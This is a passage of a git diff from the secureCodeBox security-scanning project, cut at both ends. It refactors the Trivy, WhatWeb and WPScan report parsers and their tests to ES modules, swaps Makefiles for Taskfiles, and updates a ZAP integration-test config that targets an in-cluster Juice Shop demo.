trivyK8sFinding.PrimaryURL}] : []; - - const url_references = getUrlReferences(trivyK8sFinding.References).filter(ref => ref.value !== trivyK8sFinding.PrimaryURL); +function convertTrivyK8sFindingToSCBFinding( + trivyK8sFinding, + clusterName, + namespace, + kind, + k8sName, + target, + clazz, + type, + categoryName, +) { + let references = trivyK8sFinding.PrimaryURL + ? [{ type: "URL", value: trivyK8sFinding.PrimaryURL }] + : []; + + const url_references = getUrlReferences(trivyK8sFinding.References).filter( + (ref) => ref.value !== trivyK8sFinding.PrimaryURL, + ); references = references.concat(url_references); - const category = categoryName === 'Vulnerabilities' ? 'Vulnerability' : 'Misconfiguration'; + const category = + categoryName === "Vulnerabilities" ? "Vulnerability" : "Misconfiguration"; - let name = `Finding in Dependency ${trivyK8sFinding.PkgName} (${trivyK8sFinding.InstalledVersion})` + let name = `Finding in Dependency ${trivyK8sFinding.PkgName} (${trivyK8sFinding.InstalledVersion})`; if (trivyK8sFinding.Title) { name = trivyK8sFinding.Title; if (trivyK8sFinding.Message) { @@ -179,9 +246,9 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp if (namespace) urlParams.push(`Namespace=${namespace}`); urlParams.push(`Kind=${kind}`, `Name=${k8sName}`); - const location = baseUrl + urlParams.join('&'); + const location = baseUrl + urlParams.join("&"); - let foundIn = `Target: '${target}'` + let foundIn = `Target: '${target}'`; if (clazz) { foundIn = `${foundIn} / Class: '${clazz}'`; } @@ -195,13 +262,17 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp category, location, severity: getAdjustedSeverity(trivyK8sFinding.Severity), - mitigation: trivyK8sFinding.Resolution ? trivyK8sFinding.Resolution : undefined, + mitigation: trivyK8sFinding.Resolution + ? trivyK8sFinding.Resolution + : undefined, references, attributes: { installedVersion: trivyK8sFinding.InstalledVersion, fixedVersion: trivyK8sFinding.FixedVersion, packageName: trivyK8sFinding.PkgName, - id: trivyK8sFinding.VulnerabilityID ? trivyK8sFinding.VulnerabilityID : trivyK8sFinding.ID, + id: trivyK8sFinding.VulnerabilityID + ? trivyK8sFinding.VulnerabilityID + : trivyK8sFinding.ID, references: trivyK8sFinding.References, foundIn, }, @@ -213,33 +284,36 @@ function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namesp * Create URL references from the vulnerability references */ function getUrlReferences(References) { - return References ? References.filter(ref => ref.startsWith("http")).map(ref => ({type: "URL", value: ref})) : []; + return References + ? References.filter((ref) => ref.startsWith("http")).map((ref) => ({ + type: "URL", + value: ref, + })) + : []; } function getCategory(target) { - let category = "Image Vulnerability"; - if (target.endsWith("package-lock.json") || target == "Node.js") { - category = "NPM Package Vulnerability"; - } else if (target.endsWith("Gemfile.lock")) { - category = "Ruby Package Vulnerability"; - } else if (target.endsWith("Pipfile.lock")) { - category = "Python Package Vulnerability"; - } else if (target.endsWith("Cargo.lock")) { - category = "Rust Package Vulnerability"; - } else if (target.endsWith("Composer.lock")) { - category = "PHP Package Vulnerability"; - } else if (target.endsWith("go.sum")) { - category = "Go Package Vulnerability"; - } - return category; + let category = "Image Vulnerability"; + if (target.endsWith("package-lock.json") || target == "Node.js") { + category = "NPM Package Vulnerability"; + } else if (target.endsWith("Gemfile.lock")) { + category = "Ruby Package Vulnerability"; + } else if (target.endsWith("Pipfile.lock")) { + category = "Python Package Vulnerability"; + } else if (target.endsWith("Cargo.lock")) { + category = "Rust Package Vulnerability"; + } else if (target.endsWith("Composer.lock")) { + category = "PHP Package Vulnerability"; + } else if (target.endsWith("go.sum")) { + category = "Go Package Vulnerability"; + } + return category; } -function getAdjustedSeverity(severity){ +function getAdjustedSeverity(severity) { return severity === "CRITICAL" - ? "HIGH" - : severity === "UNKNOWN" - ? "INFORMATIONAL" - : severity; + ? "HIGH" + : severity === "UNKNOWN" + ? "INFORMATIONAL" + : severity; } - -module.exports.parse = parse; diff --git a/scanners/trivy/parser/parser.test.js b/scanners/trivy/parser/parser.test.js index 12c60fd9b2..99ee187c53 100644 --- a/scanners/trivy/parser/parser.test.js +++ b/scanners/trivy/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v10.2.0.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v10.2.0.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -21,10 +20,11 @@ test("parses bkimminich/juice-shop:v10.2.0 result file into findings", async () }); test("parses bkimminich/juice-shop:v12.10.2 result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -32,34 +32,35 @@ test("parses bkimminich/juice-shop:v12.10.2 result file into findings", async () }); test("parses securecodebox:master result file into findings", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/securecodebox-repo.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/securecodebox-repo.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); }); - test("should properly parse a json file with no .Results", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-no-results.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(`[]`); - }); test("should parse a trivy-k8s scan result of a cluster running secureCodeBox itself", async () => { - const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/local-k8s-scan-result.json", { + const jsonContent = await readFile( + __dirname + "/__testFiles__/local-k8s-scan-result.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -67,33 +68,35 @@ test("should parse a trivy-k8s scan result of a cluster running secureCodeBox it }); test("should report an error in case of unexpected attributes in a trivy-k8s scan result", async () => { - const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", { + const jsonContent = await readFile( + __dirname + "/__testFiles__/k8s-results_unexpected-attribute.json", + { encoding: "utf8", - }) + }, ); await expect(parse(jsonContent)).rejects.toThrow( - "Unexpected attribute 'Secrets' on resource-item" + "Unexpected attribute 'Secrets' on resource-item", ); }); test("should parse a trivy-k8s scan result", async () => { - const jsonContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/trivy--k8s-scan-results.json", { + const jsonContent = await readFile( + __dirname + "/__testFiles__/trivy--k8s-scan-results.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchSnapshot(); }); - test("should properly parse a json file with empty .Results", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/juice-shop-v12.10.2-empty-results.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -105,7 +108,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/whatweb/Makefile b/scanners/whatweb/Makefile deleted file mode 100644 index 6b1f1aef49..0000000000 --- a/scanners/whatweb/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = whatweb -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/whatweb/Taskfile.yaml b/scanners/whatweb/Taskfile.yaml new file mode 100644 index 0000000000..0d5660bfad --- /dev/null +++ b/scanners/whatweb/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: whatweb + +tasks: + predeploy: + deps: + - demo-targets:deploy:nginx + cmds: [] diff --git a/scanners/whatweb/integration-tests/whatweb.test.js b/scanners/whatweb/integration-tests/whatweb.test.js index f6961983f8..32c0ac36ef 100644 --- a/scanners/whatweb/integration-tests/whatweb.test.js +++ b/scanners/whatweb/integration-tests/whatweb.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( - "Whatweb scans example.com", + "Whatweb scans static nginx", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "whatweb-example", "whatweb", - ["example.com"], - 90 + ["nginx.demo-targets.svc"], + 90, ); expect(count).toBe(1); @@ -28,15 +26,22 @@ test( } `); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("whatweb-invalidArg", "whatweb", ["--invalidArg", "example.com"], 90) - ).rejects.toThrow("HTTP request failed"); + scan( + "whatweb-invalid-arg", + "whatweb", + ["--invalidArg", "example.com"], + 90, + ), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."', + ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/scanners/whatweb/parser/__testFiles__/invalid-args.json b/scanners/whatweb/parser/__testFiles__/invalid-args.json new file mode 100644 index 0000000000..558ed37d93 --- /dev/null +++ b/scanners/whatweb/parser/__testFiles__/invalid-args.json @@ -0,0 +1 @@ +[ diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license b/scanners/whatweb/parser/__testFiles__/invalid-args.json.license similarity index 100% rename from auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json.license rename to scanners/whatweb/parser/__testFiles__/invalid-args.json.license diff --git a/scanners/whatweb/parser/parser.js b/scanners/whatweb/parser/parser.js index 4e29bd0f31..1830fc9e05 100644 --- a/scanners/whatweb/parser/parser.js +++ b/scanners/whatweb/parser/parser.js @@ -2,38 +2,51 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { - const targets = await parseResultFile(fileContent); +export async function parse(fileContent) { + if (!fileContent) { + return []; + } + if (fileContent === "[\n") { + throw new Error( + "Parser received an invalid report file. This can happen when whatweb is passed invalid arguments. Check the scan configuration.", + ); + } + const report = JSON.parse(fileContent); + if (!report || !Array.isArray(report)) { + return []; + } + const targets = await parseResultFile(report); return transformToFindings(targets); } function transformToFindings(targets) { - - const targetFindings = targets.map(target => { + const targetFindings = targets.map((target) => { let finding = { name: target.uri, category: "WEB APPLICATION", description: target.title, location: target.uri, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', + osi_layer: "NETWORK", + severity: "INFORMATIONAL", attributes: { requestConfig: target.requestConfig, ip_addresses: [target.ipAddress], country: target.country, - HTML5: target.html5 - } + HTML5: target.html5, + }, }; - target.additional.forEach(additional => { - if (!finding.attributes[additional[0]]) { //Check if key already exists + target.additional.forEach((additional) => { + if (!finding.attributes[additional[0]]) { + //Check if key already exists finding.attributes[additional[0]] = - (("string" in additional[1]) ? additional[1].string[0] : "") + - (("module" in additional[1]) ? "/" + additional[1].module[0] : ""); + ("string" in additional[1] ? additional[1].string[0] : "") + + ("module" in additional[1] ? "/" + additional[1].module[0] : ""); } }); - if (!finding.attributes.HTML5) //Do not show in findings if undefined + if (!finding.attributes.HTML5) + //Do not show in findings if undefined delete finding.attributes.HTML5; return finding; @@ -47,35 +60,43 @@ function transformToFindings(targets) { * @param {*} fileContent */ function parseResultFile(fileContent) { - let targetList = []; + let targetList = []; - for(const rawTarget of fileContent) { - if (Object.keys(rawTarget).length > 0) { //Check for empty target - let newTarget = { - uri: rawTarget.target, - httpStatus: rawTarget.http_status, - requestConfig: rawTarget.request_config.headers["User-Agent"], - ipAddress: null, - title: null, - html5: null, - country: null, - additional: [] - } - if(rawTarget.plugins) { - for(const [key, value] of Object.entries(rawTarget.plugins)) { - switch(key) { - case "IP": newTarget.ipAddress = value.string[0]; break; - case "Title": newTarget.title = value.string[0]; break; - case "HTML5": newTarget.html5 = true; break; - case "Country": newTarget.country = value.string[0] + "/" + value.module[0]; break; - default: newTarget.additional.push([key, value]); - } + for (const rawTarget of fileContent) { + if (Object.keys(rawTarget).length > 0) { + //Check for empty target + let newTarget = { + uri: rawTarget.target, + httpStatus: rawTarget.http_status, + requestConfig: rawTarget.request_config.headers["User-Agent"], + ipAddress: null, + title: null, + html5: null, + country: null, + additional: [], + }; + if (rawTarget.plugins) { + for (const [key, value] of Object.entries(rawTarget.plugins)) { + switch (key) { + case "IP": + newTarget.ipAddress = value.string[0]; + break; + case "Title": + newTarget.title = value.string[0]; + break; + case "HTML5": + newTarget.html5 = true; + break; + case "Country": + newTarget.country = value.string[0] + "/" + value.module[0]; + break; + default: + newTarget.additional.push([key, value]); } } - targetList.push(newTarget); } + targetList.push(newTarget); } - return targetList; + } + return targetList; } - -module.exports.parse = parse; diff --git a/scanners/whatweb/parser/parser.test.js b/scanners/whatweb/parser/parser.test.js index 3b29d40852..5e833a0cfc 100644 --- a/scanners/whatweb/parser/parser.test.js +++ b/scanners/whatweb/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("should properly parse whatweb json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/example.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/example.com.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -42,10 +41,11 @@ test("should properly parse whatweb json file", async () => { }); test("should properly parse empty whatweb json file", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/no-address.com.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/no-address.com.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -54,10 +54,11 @@ test("should properly parse empty whatweb json file", async () => { }); test("should properly parse securecodebox.io whatweb json file with higher aggression level(3)", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/securecodebox.io.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/securecodebox.io.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -131,10 +132,11 @@ test("should properly parse securecodebox.io whatweb json file with higher aggre }); test("should properly parse whatweb json file with two domains", async () => { - const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/two-domains.json", { + const fileContent = await readFile( + __dirname + "/__testFiles__/two-domains.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(fileContent); // validate findings @@ -180,3 +182,17 @@ test("should properly parse whatweb json file with two domains", async () => { ] `); }); + +test("should throw a clear error when the parser recieves a invalid report due to scanner missconfig", async () => { + const fileContent = await readFile( + __dirname + "/__testFiles__/invalid-args.json", + { + encoding: "utf8", + }, + ); + + // validate findings + await expect(parse(fileContent)).rejects.toThrow( + "Parser received an invalid report file. This can happen when whatweb is passed invalid arguments. Check the scan configuration.", + ); +}); diff --git a/scanners/wpscan/Makefile b/scanners/wpscan/Makefile deleted file mode 100644 index 1eabd323b5..0000000000 --- a/scanners/wpscan/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = wpscan -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-old-wordpress diff --git a/scanners/wpscan/Taskfile.yaml b/scanners/wpscan/Taskfile.yaml new file mode 100644 index 0000000000..a3af82c558 --- /dev/null +++ b/scanners/wpscan/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: wpscan + +tasks: + predeploy: + deps: + - demo-targets:deploy:old-wordpress + cmds: [] diff --git a/scanners/wpscan/integration-tests/wpscan.test.js b/scanners/wpscan/integration-tests/wpscan.test.js index 6ffda8a3da..5c6653a39e 100644 --- a/scanners/wpscan/integration-tests/wpscan.test.js +++ b/scanners/wpscan/integration-tests/wpscan.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "WPScan should find at least 1 finding regarding the old-wordpress demo app", @@ -13,9 +11,9 @@ test( "wpscan-scanner-dummy-scan", "wpscan", ["--url", "old-wordpress.demo-targets.svc"], - 90 + 90, ); expect(count).toBeGreaterThanOrEqual(0); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/wpscan/parser/parser.js b/scanners/wpscan/parser/parser.js index 7fa2a901a7..50716082b3 100644 --- a/scanners/wpscan/parser/parser.js +++ b/scanners/wpscan/parser/parser.js @@ -5,106 +5,114 @@ /** * Convert the WPScan file / json into secureCodeBox Findings */ -async function parse(scanResults) { - if (typeof (scanResults) === "string") // empty file +export async function parse(scanResults) { + if (!scanResults) { return []; + } - const wpscanVersion = scanResults.banner.version; - const wpscanRequestsDone = scanResults.requests_done; + const report = JSON.parse(scanResults); + if (!report || !report.target_url) { + return []; + } + + const wpscanVersion = report.banner?.version; + const wpscanRequestsDone = report.requests_done; - const targetUrl = scanResults.target_url; - const targetIp = scanResults.target_ip; + const targetUrl = report.target_url; + const targetIp = report.target_ip; // convert unix timestamp to ISO date string, multiply by 1000 because JS uses milliseconds - const identified_at = new Date(scanResults.stop_time * 1000).toISOString(); + const identified_at = new Date(report.stop_time * 1000).toISOString(); // Add a general INFORMATIONAL summary finding -const summaryFinding = { - name: "WordPress Service", - description: "WordPress Service Information", - identified_at: identified_at, - category: "WordPress Service", - location: targetUrl, - osi_layer: "APPLICATION", - severity: "INFORMATIONAL", - references: null, - confidence: scanResults.version?.confidence, - attributes: { - hostname: targetUrl, - ip_addresses: [targetIp], - wpscan_version: wpscanVersion, - wpscan_requests: wpscanRequestsDone, - wp_version: scanResults.version?.number, - wp_release_date: scanResults.version?.release_date, - wp_release_status: scanResults.version?.status, - wp_interesting_entries: scanResults.version?.interesting_entries, - wp_found_by: scanResults.version?.found_by, - wp_confirmed_by: scanResults.version?.confirmed_by, - wp_vulnerabilities: scanResults.version?.vulnerabilities, - }, -}; - -// Add all interesting findings as INFORMATIONAL -const interestingFindings = scanResults.interesting_findings.map(interestingFinding => { - // Create a flattened array of references with their types - const references = Object.entries(interestingFinding.references) - .flatMap(([key, elements]) => - elements.map(element => ({ - type: key.toUpperCase(), - value: element, - })) - ); - - // Return the interesting findings object for the current entry - return { - name: `WordPress finding '${interestingFinding.type}'`, - description: interestingFinding.to_s, - category: `WordPress ${interestingFinding.type}`, - location: interestingFinding.url, + const summaryFinding = { + name: "WordPress Service", + description: "WordPress Service Information", + identified_at: identified_at, + category: "WordPress Service", + location: targetUrl, osi_layer: "APPLICATION", severity: "INFORMATIONAL", - confidence: interestingFinding.confidence, - references: references.length > 0 ? references : null, + references: null, + confidence: report.version?.confidence, attributes: { hostname: targetUrl, - wp_interesting_entries: interestingFinding.interesting_entries, - wp_found_by: interestingFinding.found_by, - wp_confirmed_by: interestingFinding.confirmed_by, + ip_addresses: [targetIp], + wpscan_version: wpscanVersion, + wpscan_requests: wpscanRequestsDone, + wp_version: report.version?.number, + wp_release_date: report.version?.release_date, + wp_release_status: report.version?.status, + wp_interesting_entries: report.version?.interesting_entries, + wp_found_by: report.version?.found_by, + wp_confirmed_by: report.version?.confirmed_by, + wp_vulnerabilities: report.version?.vulnerabilities, }, }; -}); -// Add plugin vulnerabilities as HIGH -const pluginVulnerabilities = Object.values(scanResults.plugins).flatMap(plugin => - plugin.vulnerabilities.map(vulnerability => { - // Create a flattened array of references with their types - const references = Object.entries(vulnerability.references) - .flatMap(([key, elements]) => - elements.map(element => ({ - type: key.toUpperCase(), - value: element, - })) + // Add all interesting findings as INFORMATIONAL + const interestingFindings = report.interesting_findings.map( + (interestingFinding) => { + // Create a flattened array of references with their types + const references = Object.entries(interestingFinding.references).flatMap( + ([key, elements]) => + elements.map((element) => ({ + type: key.toUpperCase(), + value: element, + })), ); - // Return the plugin vulnerabilities object for the current plugin and vulnerability - return { - name: `WordPress finding: vulnerability in '${plugin['slug']}'`, - description: vulnerability['title'], - category: "WordPress Plugin", - location: plugin['location'], - osi_layer: "APPLICATION", - severity: "HIGH", - references: references.length > 0 ? references : null, - attributes: { - hostname: targetUrl, - confidence: plugin['confidence'], - wp_interesting_entries: plugin['interesting_entries'], - wp_found_by: plugin['found_by'], - wp_confirmed_by: plugin['confirmed_by'], - }, - }; - }) -); -// Combine all findings and return -return [summaryFinding, ...interestingFindings, ...pluginVulnerabilities]; + // Return the interesting findings object for the current entry + return { + name: `WordPress finding '${interestingFinding.type}'`, + description: interestingFinding.to_s, + category: `WordPress ${interestingFinding.type}`, + location: interestingFinding.url, + osi_layer: "APPLICATION", + severity: "INFORMATIONAL", + confidence: interestingFinding.confidence, + references: references.length > 0 ? references : null, + attributes: { + hostname: targetUrl, + wp_interesting_entries: interestingFinding.interesting_entries, + wp_found_by: interestingFinding.found_by, + wp_confirmed_by: interestingFinding.confirmed_by, + }, + }; + }, + ); + + // Add plugin vulnerabilities as HIGH + const pluginVulnerabilities = Object.values(report.plugins).flatMap( + (plugin) => + plugin.vulnerabilities.map((vulnerability) => { + // Create a flattened array of references with their types + const references = Object.entries(vulnerability.references).flatMap( + ([key, elements]) => + elements.map((element) => ({ + type: key.toUpperCase(), + value: element, + })), + ); + // Return the plugin vulnerabilities object for the current plugin and vulnerability + return { + name: `WordPress finding: vulnerability in '${plugin["slug"]}'`, + description: vulnerability["title"], + category: "WordPress Plugin", + location: plugin["location"], + osi_layer: "APPLICATION", + severity: "HIGH", + references: references.length > 0 ? references : null, + attributes: { + hostname: targetUrl, + confidence: plugin["confidence"], + wp_interesting_entries: plugin["interesting_entries"], + wp_found_by: plugin["found_by"], + wp_confirmed_by: plugin["confirmed_by"], + }, + }; + }), + ); + + // Combine all findings and return + return [summaryFinding, ...interestingFindings, ...pluginVulnerabilities]; } -module.exports.parse = parse; diff --git a/scanners/wpscan/parser/parser.test.js b/scanners/wpscan/parser/parser.test.js index 69a866f652..068de0aff8 100644 --- a/scanners/wpscan/parser/parser.test.js +++ b/scanners/wpscan/parser/parser.test.js @@ -2,18 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("WPScan parser parses a successfully scan result with at least one informational finding", async () => { - const scanResults = JSON.parse( - await readFile(__dirname + "/__testFiles__/example-latest.json", { + const scanResults = await readFile( + __dirname + "/__testFiles__/example-latest.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(scanResults); @@ -188,10 +187,11 @@ test("WPScan parser parses a successfully scan result with at least one informat }); test("WPScan parser parses a scan result file without a detected wp version correctly", async () => { - const scanResults = JSON.parse( - await readFile(__dirname + "/__testFiles__/no-version-detected.json", { + const scanResults = await readFile( + __dirname + "/__testFiles__/no-version-detected.json", + { encoding: "utf8", - }) + }, ); const findings = await parse(scanResults); @@ -333,7 +333,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/empty-localhost.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/zap-automation-framework/Makefile b/scanners/zap-automation-framework/Makefile deleted file mode 100644 index d28e80fd1d..0000000000 --- a/scanners/zap-automation-framework/Makefile +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = zap-automation-framework - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-juiceshop deploy-test-dep-nginx deploy-test-dep-bodgeit deploy-test-dep-petstore - -#Run integration tests for the ZAP Automation Framework Scanner. -integration-tests: - @echo ".: 🩺 Starting integration test in kind namespace 'integration-tests'." - kubectl -n integration-tests delete scans --all - kubectl -n integration-tests delete configmaps --all - helm -n integration-tests upgrade --install $(scanner) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" - kubectl apply -f ./integration-tests/automation-framework-configMap.yaml -n integration-tests - cd $(SCANNERS_DIR) && npm ci && cd $(scanner)/integration-tests && npm run test:integration -- $(scanner)/integration-tests diff --git a/scanners/zap-automation-framework/Taskfile.yaml b/scanners/zap-automation-framework/Taskfile.yaml new file mode 100644 index 0000000000..b3c480bcef --- /dev/null +++ b/scanners/zap-automation-framework/Taskfile.yaml @@ -0,0 +1,24 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: zap-automation-framework + +tasks: + predeploy: + deps: + - demo-targets:deploy:juice-shop + - demo-targets:deploy:bodgeit + - demo-targets:deploy:nginx + - demo-targets:deploy:swagger-petstore + cmds: + - kubectl apply -f ./integration-tests/automation-framework-configMap.yaml -n integration-tests diff --git a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml index 0ebd3f3f23..652e7053df 100644 --- a/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml +++ b/scanners/zap-automation-framework/integration-tests/automation-framework-configMap.yaml @@ -2,7 +2,6 @@ # # SPDX-License-Identifier: Apache-2.0 - --- apiVersion: v1 kind: ConfigMap @@ -12,11 +11,11 @@ data: automation.yaml: |- env: # The environment, mandatory - contexts: # List of 1 or more contexts, mandatory - - name: test-config # Name to be used to refer to this context in other jobs, mandatory - urls: ["http://juiceshop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included + contexts: # List of 1 or more contexts, mandatory + - name: test-config # Name to be used to refer to this context in other jobs, mandatory + urls: ["http://juice-shop.demo-targets.svc:3000"] # A mandatory list of top level urls, everything under each url will be included includePaths: - - "http://juiceshop.demo-targets.svc:3000/.*" # An optional list of regexes to include + - "http://juice-shop.demo-targets.svc:3000/.*" # An optional list of regexes to include excludePaths: - ".*socket\\.io.*" - ".*\\.png" @@ -25,24 +24,24 @@ data: - ".*\\.woff" - ".*\\.woff2" - ".*\\.ttf" - - ".*\\.ico" # An optional list of regexes to exclude + - ".*\\.ico" # An optional list of regexes to exclude authentication: method: "json" parameters: - loginPageUrl: "http://juiceshop.demo-targets.svc:3000/rest/user" - loginRequestUrl: "http://juiceshop.demo-targets.svc:3000/rest/user/login" + loginPageUrl: "http://juice-shop.demo-targets.svc:3000/rest/user" + loginRequestUrl: "http://juice-shop.demo-targets.svc:3000/rest/user/login" loginRequestBody: '{"email":"admin@juice-sh.op","password":"admin123"}' verification: method: "response" loggedOutRegex: '\Q{"user":{}}\E' loggedInRegex: '\Q\E' users: - - name: "juiceshop-user-1" + - name: "juice-shop-user-1" credentials: username: "admin@juice-sh.op" password: "admin123" parameters: - failOnError: true # If set exit on an error + failOnError: true # If set exit on an error failOnWarning: false # If set exit on a warning progressToStdout: true # If set will write job progress to stdout @@ -53,25 +52,21 @@ data: scanOnlyInScope: true # Bool: Only scan URLs in scope (recommended) - type: spider # The traditional spider - fast but doesnt handle modern apps so well parameters: - context: test-config # String: Name of the context to spider, default: first context - user: juiceshop-user-1 # String: An optional user to use for authentication, must be defined in the env - maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + user: juice-shop-user-1 # String: An optional user to use for authentication, must be defined in the env + maxDuration: 2 # Int: The max time in minutes the spider will be allowed to run for, default: 0 unlimited - type: spiderAjax # The ajax spider - slower than the spider but handles modern apps well parameters: - context: test-config # String: Name of the context to spider, default: first context - maxDuration: 2 # Int: The max time in minutes the ajax spider will be allowed to run for, default: 0 unlimited + context: test-config # String: Name of the context to spider, default: first context + maxDuration: 2 # Int: The max time in minutes the 